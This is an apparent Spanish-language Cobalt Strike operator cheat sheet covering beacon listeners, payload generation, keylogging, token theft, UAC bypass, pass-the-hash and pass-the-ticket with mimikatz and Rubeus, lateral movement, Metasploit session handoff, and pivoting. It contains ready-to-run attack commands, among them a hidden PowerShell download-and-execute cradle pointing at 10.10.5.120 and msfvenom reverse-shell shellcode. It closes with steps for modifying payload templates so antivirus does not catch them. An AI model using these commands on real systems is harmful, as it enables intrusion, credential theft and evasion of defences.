Cobalt Strike -> Listeners -> Add/Edit luego puedes seleccionar dónde escuchar, qué tipo de beacon usar (http, dns, smb...) y más.
Peer2Peer Listeners
Los beacons de estos listeners no necesitan comunicarse directamente con el C2, pueden comunicarse a través de otros beacons.
Cobalt Strike -> Listeners -> Add/Edit luego necesitas seleccionar los beacons TCP o SMB
El beacon TCP establecerá un listener en el puerto seleccionado. Para conectarte a un beacon TCP usa el comando connect <ip> <port> desde otro beacon
El beacon smb escuchará en un pipename con el nombre seleccionado. Para conectarte a un beacon SMB necesitas usar el comando link [target] [pipe].
Generate & Host payloads
Generate payloads in files
Attacks -> Packages ->
HTMLApplication para archivos HTA
MS Office Macro para un documento de office con una macro
Windows Executable para un .exe, .dll o servicio .exe
Windows Executable (S) para un stageless .exe, .dll o servicio .exe (mejor stageless que staged, menos IoCs)
Generate & Host payloads
Attacks -> Web Drive-by -> Scripted Web Delivery (S) Esto generará un script/executable para descargar el beacon de cobalt strike en formatos como: bitsadmin, exe, powershell y python
Host Payloads
Si ya tienes el archivo que deseas alojar en un servidor web, solo ve a Attacks -> Web Drive-by -> Host File y selecciona el archivo para alojar y la configuración del servidor web.
Beacon Options
# Ejecutar binario .NET localexecute-assembly</path/to/executable.exe># Capturas de pantallaprintscreen# Tomar una captura de pantalla única mediante el método PrintScrscreenshot# Tomar una captura de pantalla únicascreenwatch# Tomar capturas de pantalla periódicas del escritorio## Ve a Ver -> Capturas de pantalla para verlas# keyloggerkeylogger [pid] [x86|x64]## Ver > Teclas presionadas para ver las teclas presionadas# escaneo de puertosportscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Inyectar acción de escaneo de puertos dentro de otro procesoportscan [targets] [ports] [arp|icmp|none] [max connections]# Powershell# Importar módulo de Powershellpowershell-importC:\path\to\PowerView.ps1powershell<soloescribeelcmddepowershellaquí># Suplantación de usuario## Generación de token con credencialesmake_token [DOMAIN\user] [password] #Crear token para suplantar a un usuario en la redls \\computer_name\c$ # Intentar usar el token generado para acceder a C$ en una computadorarev2self# Dejar de usar el token generado con make_token## El uso de make_token genera el evento 4624: Una cuenta se ha iniciado sesión correctamente. Este evento es muy común en un dominio de Windows, pero se puede reducir filtrando por el Tipo de Inicio de Sesión. Como se mencionó anteriormente, utiliza LOGON32_LOGON_NEW_CREDENTIALS que es el tipo 9.# Bypass de UACelevatesvc-exe<listener>elevateuac-token-duplication<listener>runasadminuac-cmstpluapowershell.exe-nop-whidden-c"IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"## Robar token de pid## Como make_token pero robando el token de un procesosteal_token [pid] # Además, esto es útil para acciones de red, no acciones locales## De la documentación de la API sabemos que este tipo de inicio de sesión "permite al llamador clonar su token actual". Por eso la salida de Beacon dice Suplantado <current_username> - está suplantando nuestro propio token clonado.ls \\computer_name\c$ # Intentar usar el token generado para acceder a C$ en una computadorarev2self# Dejar de usar el token de steal_token## Lanzar proceso con nuevas credencialesspawnas [domain\username] [password] [listener] #Hazlo desde un directorio con acceso de lectura como: cd C:\## Al igual que make_token, esto generará el evento de Windows 4624: Una cuenta se ha iniciado sesión correctamente pero con un tipo de inicio de sesión de 2 (LOGON32_LOGON_INTERACTIVE). Detallará el usuario que llama (TargetUserName) y el usuario suplantado (TargetOutboundUserName).## Inyectar en procesoinject [pid] [x64|x86] [listener]## Desde un punto de vista de OpSec: No realices inyección entre plataformas a menos que realmente sea necesario (por ejemplo, x86 -> x64 o x64 -> x86).## Pasar el hash## Este proceso de modificación requiere parchar la memoria de LSASS, lo cual es una acción de alto riesgo, requiere privilegios de administrador local y no es muy viable si Protected Process Light (PPL) está habilitado.pth [pid] [arch] [DOMAIN\user] [NTLM hash]pth [DOMAIN\user] [NTLM hash]## Pasar el hash a través de mimikatzmimikatzsekurlsa::pth/user:<username>/domain:<DOMAIN>/ntlm:<NTLMHASH>/run:"powershell -w hidden"## Sin /run, mimikatz genera un cmd.exe, si estás ejecutando como un usuario con Escritorio, verá el shell (si estás ejecutando como SYSTEM, estás bien)steal_token<pid>#Robar token de proceso creado por mimikatz## Pasar el ticket## Solicitar un ticketexecute-assemblyC:\path\Rubeus.exeasktgt/user:<username>/domain:<domain>/aes256:<aes_keys>/nowrap/opsec## Crear una nueva sesión de inicio de sesión para usar con el nuevo ticket (para no sobrescribir el comprometido)make_token<domain>\<username>DummyPass## Escribir el ticket en la máquina del atacante desde una sesión de powershell & cargarlo[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))kerberos_ticket_useC:\Users\Administrator\Desktop\jkingTGT.kirbi## Pasar el ticket desde SYSTEM## Generar un nuevo proceso con el ticketexecute-assemblyC:\path\Rubeus.exeasktgt/user:<USERNAME>/domain:<DOMAIN>/aes256:<AESKEY>/nowrap/opsec/createnetonly:C:\Windows\System32\cmd.exe## Robar el token de ese procesosteal_token<pid>## Extraer ticket + Pasar el ticket### Listar ticketsexecute-assemblyC:\path\Rubeus.exetriage### Volcar ticket interesante por luidexecute-assemblyC:\path\Rubeus.exedump/service:krbtgt/luid:<luid>/nowrap### Crear nueva sesión de inicio de sesión, anotar luid y processidexecute-assemblyC:\path\Rubeus.execreatenetonly/program:C:\Windows\System32\cmd.exe### Insertar ticket en la sesión de inicio de sesión generadaexecute-assemblyC:\path\Rubeus.exeptt/luid:0x92a8c/ticket:[...base64-ticket...]### Finalmente, robar el token de ese nuevo procesosteal_token<pid># Movimiento Lateral## Si se creó un token, se usarájump [method] [target] [listener]## Métodos:## psexec x86 Usar un servicio para ejecutar un artefacto Service EXE## psexec64 x64 Usar un servicio para ejecutar un artefacto Service EXE## psexec_psh x86 Usar un servicio para ejecutar una línea de PowerShell## winrm x86 Ejecutar un script de PowerShell a través de WinRM## winrm64 x64 Ejecutar un script de PowerShell a través de WinRMremote-exec [method] [target] [command]## Métodos:## psexec Ejecución remota a través del Administrador de Control de Servicios## winrm Ejecución remota a través de WinRM (PowerShell)## wmi Ejecución remota a través de WMI## Para ejecutar un beacon con wmi (no está en el comando jump) solo sube el beacon y ejecútalobeacon> uploadC:\Payloads\beacon-smb.exebeacon> remote-execwmisrv-1C:\Windows\beacon-smb.exe# Pasar sesión a Metasploit - A través de listener## En el host de metaploitmsf6>useexploit/multi/handlermsf6exploit(multi/handler) >setpayloadwindows/meterpreter/reverse_httpmsf6exploit(multi/handler) >setLHOSTeth0msf6exploit(multi/handler) >setLPORT8080msf6exploit(multi/handler) >exploit-j## En cobalt: Listeners > Add y establece el Payload en Foreign HTTP. Establece el Host en 10.10.5.120, el Puerto en 8080 y haz clic en Guardar.beacon> spawnmetasploit## Solo puedes generar sesiones Meterpreter x86 con el listener extranjero.# Pasar sesión a Metasploit - A través de inyección de shellcode## En el host de metasploitmsfvenom-pwindows/x64/meterpreter_reverse_httpLHOST=<IP>LPORT=<PORT>-fraw-o/tmp/msf.bin## Ejecuta msfvenom y prepara el listener multi/handler## Copia el archivo bin a la máquina host de cobalt strikepsshinject<pid>x64C:\Payloads\msf.bin#Inyectar shellcode de metasploit en un proceso x64# Pasar sesión de metasploit a cobalt strike## Generar shellcode Beacon stageless, ve a Attacks > Packages > Windows Executable (S), selecciona el listener deseado, selecciona Raw como el tipo de salida y selecciona Usar carga útil x64.## Usa post/windows/manage/shellcode_inject en metasploit para inyectar el shellcode generado de cobalt strike# Pivoting## Abrir un proxy socks en el teamserverbeacon> socks1080# Conexión SSHbeacon> ssh10.10.17.12:22usernamepassword
Evitando AVs
Artifact Kit
Usualmente en /opt/cobaltstrike/artifact-kit puedes encontrar el código y las plantillas precompiladas (en /src-common) de los payloads que cobalt strike va a usar para generar los beacons binarios.
Usando ThreatCheck con la puerta trasera generada (o solo con la plantilla compilada) puedes encontrar qué está haciendo que el defensor se active. Generalmente es una cadena. Por lo tanto, solo puedes modificar el código que está generando la puerta trasera para que esa cadena no aparezca en el binario final.
Después de modificar el código, solo ejecuta ./build.sh desde el mismo directorio y copia la carpeta dist-pipe/ en el cliente de Windows en C:\Tools\cobaltstrike\ArtifactKit.
No olvides cargar el script agresivo dist-pipe\artifact.cna para indicar a Cobalt Strike que use los recursos del disco que queremos y no los que se cargaron.
Kit de Recursos
La carpeta ResourceKit contiene las plantillas para las cargas útiles basadas en scripts de Cobalt Strike, incluyendo PowerShell, VBA y HTA.
Usando ThreatCheck con las plantillas, puedes encontrar qué es lo que no le gusta al defensor (AMSI en este caso) y modificarlo:
Modificando las líneas detectadas se puede generar una plantilla que no será atrapada.
No olvides cargar el script agresivo ResourceKit\resources.cna para indicar a Cobalt Strike que use los recursos del disco que queremos y no los que están cargados.
